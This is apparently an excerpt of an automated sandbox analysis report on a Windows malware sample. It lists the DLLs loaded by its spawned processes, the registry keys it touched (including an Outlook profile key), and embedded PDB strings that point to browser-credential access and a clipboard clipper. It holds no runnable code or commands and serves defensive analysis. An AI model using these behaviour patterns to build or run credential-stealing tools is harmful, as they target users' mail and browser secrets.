Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msctfui.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe	Section loaded: apphelp.dll

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: kO1P1YnLst.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: kO1P1YnLst.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: kO1P1YnLst.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: kO1P1YnLst.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: kO1P1YnLst.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: kO1P1YnLst.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: kO1P1YnLst.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: u5c4.0.exe, 00000001.00000002.2520130811.000000006CCAD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036160514.00000240F7980000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1883500412.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888596388.00000000049F8000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888307607.0000000004640000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138665040.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2139000539.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140183623.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139995282.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140368721.0000000003FF7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2370662584.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2367955603.0000000005409000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: mozglue.pdb source: u5c4.0.exe, 00000001.00000002.2520130811.000000006CCAD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000002.1882327714.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000000.1797546896.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2066260274.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2136653870.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3071517610.00000240FE690000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027627849.00000240F7070000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1889183698.000000006C8B7000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000D.00000002.2140800122.000000006CE97000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3035836028.00000240F7970000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027735940.00000240F7080000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: kO1P1YnLst.exe
Source:	Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: IIDHJDGCGD.exe, 00000017.00000002.2969185171.0000000000EAC000.00000002.00000001.01000000.0000001D.sdmp, IIDHJDGCGD.exe, 00000017.00000000.2476318454.0000000000EAC000.00000002.00000001.01000000.0000001D.sdmp, tiktok[1].exe.1.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
